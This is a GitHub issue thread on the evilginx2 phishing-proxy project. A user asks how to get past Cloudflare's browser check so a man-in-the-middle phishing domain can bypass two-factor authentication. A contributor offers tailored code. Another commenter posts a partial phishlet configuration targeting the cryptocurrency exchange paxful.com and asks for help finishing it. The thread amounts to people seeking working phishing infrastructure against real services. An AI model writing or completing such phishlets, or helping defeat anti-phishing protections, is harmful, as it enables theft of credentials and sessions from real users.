### ISSUE TITLE
CLOUD FLARE JAVASCRIPT PROTECTED WEB SERVER'S

### ISSUE THREAD

**Issue by micahunder** [kgretzky/evilginx2#277]
Hello Kuba, I was Testing Evilginx2, which is supposed to help me bypass 2FA on web servers by using the MITM proxy phishing attack.
I run the test on couple of web servers 
I decided to try this project out with web servers using Cloud flare based JavaScript security to mitigate MITM proxy phishing techniques such Evilginx2.
Been facing problems for a while now.

This leaves my phishing domain hanging on cloud flare's DDOS protection page with the text below.

Checking your browser before accessing cloudflare-protected.site.
This process is automatic. Your browser will redirect to your requested content shortly.
Please allow up to 5 seconds…
DDoS protection by Cloud flare
Ray ID:

Anyway I can address this issue? Thank you.

**Comment by JamesCullum** [comment]
Just add it as phishing domain. If you provide a demo URL, we could provide you more specific code.

**Comment by Karmel0x** [comment]
Related to [this issue](https://github.com/Karmel0x/cloudflare-js-bypass/issues/2).

**Comment by HsounaZinoubi** [comment]
@JamesCullum can you help me with this
`min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'paxful.com', session: true, is_landing: true}
sub_filters:
  - {triggers_on: 'www.paxful.com', orig_sub: 'www', domain: 'paxful.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.paxful.com', orig_sub: 'www', domain: 'paxful.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'www.paxful.com', orig_sub: 'www', domain: 'paxful.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']}`
